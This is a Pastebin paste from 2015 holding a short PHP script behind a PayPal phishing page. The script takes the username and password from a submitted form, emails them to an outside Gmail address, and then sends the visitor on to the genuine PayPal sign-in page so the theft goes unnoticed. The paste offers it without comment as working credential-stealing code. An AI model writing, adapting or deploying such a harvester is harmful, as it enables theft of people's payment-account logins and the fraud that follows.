Advertisement
Guest User

codezazivka

a guest
May 25th, 2015
254
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.32 KB | None | 0 0
  1. <?php
  2.  
  3. if ($_POST['submit']) {
  4.  
  5. $message = "username: " . $_POST['username'] . "\n";
  6. $message .= "password: " . $_POST['password'] . "\n";
  7. $to = "phahacking@gmail.com";
  8.  
  9. mail($to, 'Pay Pal nalog code', $message);
  10.  
  11. }
  12. ?>
  13. <script>location.href='https://www.paypal.com/signin/?country.x=US&locale.x=en_US;'</script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement